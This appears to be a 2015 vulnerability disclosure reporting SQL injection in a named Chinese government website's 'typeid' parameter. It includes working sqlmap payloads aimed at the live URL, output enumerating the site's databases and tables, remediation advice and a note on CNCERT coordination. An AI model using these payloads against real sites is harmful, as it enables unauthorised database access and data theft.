2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开
typeid 参数未做过滤,存在 SQL 注入。注入点为 http://www.wsfgj.gov.cn/ws_web/newlist.aspx?typeid=13
Place: GET
Parameter: typeid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: typeid=(SELECT (CASE WHEN (7498=7498) THEN 13 ELSE 7498*(SELECT 7498 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: typeid=13 AND 9865=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(101)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9865=9865) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(115)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: typeid=-7980 UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(101)+CHAR(99)+CHAR(113)+CHAR(81)+CHAR(84)+CHAR(72)+CHAR(83)+CHAR(116)+CHAR(101)+CHAR(73)+CHAR(109)+CHAR(67)+CHAR(122)+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(115)+CHAR(113),NULL,NULL-- 

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: typeid=13 AND 9762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
[15:50:16] [INFO] testing Microsoft SQL Server
[15:50:16] [INFO] confirming Microsoft SQL Server
[15:50:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:50:17] [INFO] fetching database names
[15:50:18] [INFO] the SQL query used returns 11 entries
[15:50:18] [INFO] retrieved: "fwcq"
[15:50:18] [INFO] retrieved: "ls0815"
[15:50:18] [INFO] retrieved: "master"
[15:50:19] [INFO] retrieved: "model"
[15:50:19] [INFO] retrieved: "msdb"
[15:50:19] [INFO] retrieved: "ReportServer"
[15:50:20] [INFO] retrieved: "ReportServerTempDB"
[15:50:20] [INFO] retrieved: "tempdb"
[15:50:20] [INFO] retrieved: "ts_web_dremis_old"
[15:50:20] [INFO] retrieved: "ts_web_dremis_old"
[15:50:21] [INFO] retrieved: "ws_dremis"
Database: master [289 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || sys.computed_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.credentials || sys.crypt_properties || sys.data_spaces || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || 
sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_db_file_space_usage || sys.dm_db_index_usage_stats || sys.dm_db_mirroring_connections || sys.dm_db_missing_index_details || sys.dm_db_missing_index_group_stats || sys.dm_db_missing_index_groups || sys.dm_db_partition_stats || sys.dm_db_session_space_usage || sys.dm_db_task_space_usage || sys.dm_exec_background_job_queue_stats || sys.dm_exec_background_job_queue_stats || sys.dm_exec_cached_plans || sys.dm_exec_connections || sys.dm_exec_query_optimizer_info || sys.dm_exec_query_stats || sys.dm_exec_query_transformation_stats || sys.dm_exec_requests || sys.dm_exec_sessions || sys.dm_fts_active_catalogs || sys.dm_fts_index_population || sys.dm_fts_memory_buffers || sys.dm_fts_memory_pools || sys.dm_fts_population_ranges || sys.dm_io_backup_tapes || sys.dm_io_cluster_shared_drives || sys.dm_io_pending_io_requests || sys.dm_os_buffer_descriptors || sys.dm_os_child_instances || sys.dm_os_cluster_nodes || sys.dm_os_hosts || sys.dm_os_latch_stats || sys.dm_os_loaded_modules || sys.dm_os_memory_allocations || sys.dm_os_memory_cache_clock_hands || sys.dm_os_memory_cache_counters || sys.dm_os_memory_cache_entries || sys.dm_os_memory_cache_hash_tables || sys.dm_os_memory_clerks || sys.dm_os_memory_objects || sys.dm_os_memory_pools || sys.dm_os_performance_counters || sys.dm_os_ring_buffers || sys.dm_os_schedulers || sys.dm_os_stacks || sys.dm_os_sublatches || sys.dm_os_sys_info || sys.dm_os_tasks || sys.dm_os_threads || sys.dm_os_virtual_address_dump || sys.dm_os_wait_stats || sys.dm_os_waiting_tasks || sys.dm_os_worker_local_storage || sys.dm_os_workers || sys.dm_qn_subscriptions || sys.dm_repl_articles || sys.dm_repl_schemas || sys.dm_repl_tranhash || sys.dm_repl_traninfo || sys.dm_tran_active_snapshot_database_transactions || sys.dm_tran_active_transactions || sys.dm_tran_current_snapshot || sys.dm_tran_current_transaction || sys.dm_tran_database_transactions || 
sys.dm_tran_locks || sys.dm_tran_session_transactions || sys.dm_tran_top_version_generators || sys.dm_tran_transactions_snapshot || sys.dm_tran_version_store || sys.endpoint_webmethods || sys.endpoints || sys.event_notification_event_types || sys.event_notifications || sys.events || sys.extended_procedures || sys.extended_properties || sys.filegroups || sys.foreign_key_columns || sys.foreign_keys || sys.fulltext_catalogs || sys.fulltext_document_types || sys.fulltext_index_catalog_usages || sys.fulltext_index_columns || sys.fulltext_indexes || sys.fulltext_languages || sys.http_endpoints || sys.identity_columns || sys.index_columns || sys.indexes || sys.internal_tables || sys.key_constraints || sys.key_encryptions || sys.linked_logins || sys.login_token || sys.master_files || sys.master_key_passwords || sys.message_type_xml_schema_collection_usages || sys.messages || sys.module_assembly_usages || sys.numbered_procedure_parameters || sys.numbered_procedures || sys.objects || sys.openkeys || sys.parameter_type_usages || sys.parameter_xml_schema_collection_usages || sys.parameters || sys.partition_functions || sys.partition_parameters || sys.partition_range_values || sys.partition_schemes || sys.partitions || sys.plan_guides || sys.procedures || sys.remote_logins || sys.remote_service_bindings || sys.routes || sys.schemas || sys.securable_classes || sys.server_assembly_modules || sys.server_event_notifications || sys.server_events || sys.server_permissions || sys.server_principals || sys.server_role_members || sys.server_sql_modules || sys.server_trigger_events || sys.server_triggers || sys.servers || sys.service_broker_endpoints || sys.service_contract_message_usages || sys.service_contract_usages || sys.service_contracts || sys.service_message_types || sys.service_queue_usages || sys.service_queues || sys.services || sys.soap_endpoints || sys.sql_dependencies || sys.sql_logins || sys.sql_modules || sys.stats_columns || sys.stats_columns || sys.symmetric_keys || 
sys.synonyms || sys.sysaltfiles || sys.syscacheobjects || sys.syscharsets || sys.syscolumns || sys.syscomments || sys.sysconfigures || sys.sysconstraints || sys.syscurconfigs || sys.syscursorcolumns || sys.syscursorrefs || sys.syscursors || sys.syscursortables || sys.sysdatabases || sys.sysdepends || sys.sysdevices || sys.sysfilegroups || sys.sysfiles || sys.sysforeignkeys || sys.sysfulltextcatalogs || sys.sysindexes || sys.sysindexkeys || sys.syslanguages || sys.syslockinfo || sys.syslogins || sys.sysmembers || sys.sysmessages || sys.sysobjects || sys.sysoledbusers || sys.sysopentapes || sys.sysperfinfo || sys.syspermissions || sys.sysprocesses || sys.sysprotects || sys.sysreferences || sys.sysremotelogins || sys.syssegments || sys.sysservers || sys.system_columns || sys.system_components_surface_area_configuration || sys.system_internals_allocation_units || sys.system_internals_partition_columns || sys.system_internals_partitions || sys.system_objects || sys.system_parameters || sys.system_sql_modules || sys.system_views || sys.systypes || sys.sysusers || sys.tables || sys.tcp_endpoints || sys.trace_categories || sys.trace_columns || sys.trace_event_bindings || sys.trace_events || sys.trace_subclass_values || sys.traces || sys.transmission_queue || sys.trigger_events || sys.triggers || sys.type_assembly_usages || sys.types || sys.user_token || sys.via_endpoints || sys.views || sys.xml_indexes || sys.xml_schema_attributes || sys.xml_schema_collections || sys.xml_schema_component_placements || sys.xml_schema_components || sys.xml_schema_elements || sys.xml_schema_facets || sys.xml_schema_model_groups || sys.xml_schema_namespaces || sys.xml_schema_types || sys.xml_schema_wildcard_namespaces || sys.xml_schema_wildcards
如上
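危害不大,但建议还是处理一下:对 typeid 参数做整数类型校验,并改用参数化查询,不要把参数直接拼接进 SQL 语句。另外,上面的结果显示报错型注入可用且能枚举出 master 等全部数据库,因此还应关闭向页面输出数据库详细错误信息,并把网站所用数据库账号的权限收紧到业务库。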
危害等级:中
漏洞Rank:8
确认时间:2015-05-15 17:39
CNVD未直接复现所述情况,已经转由CNCERT下发山东分中心,由其后续协调网站管理单位处置。
暂无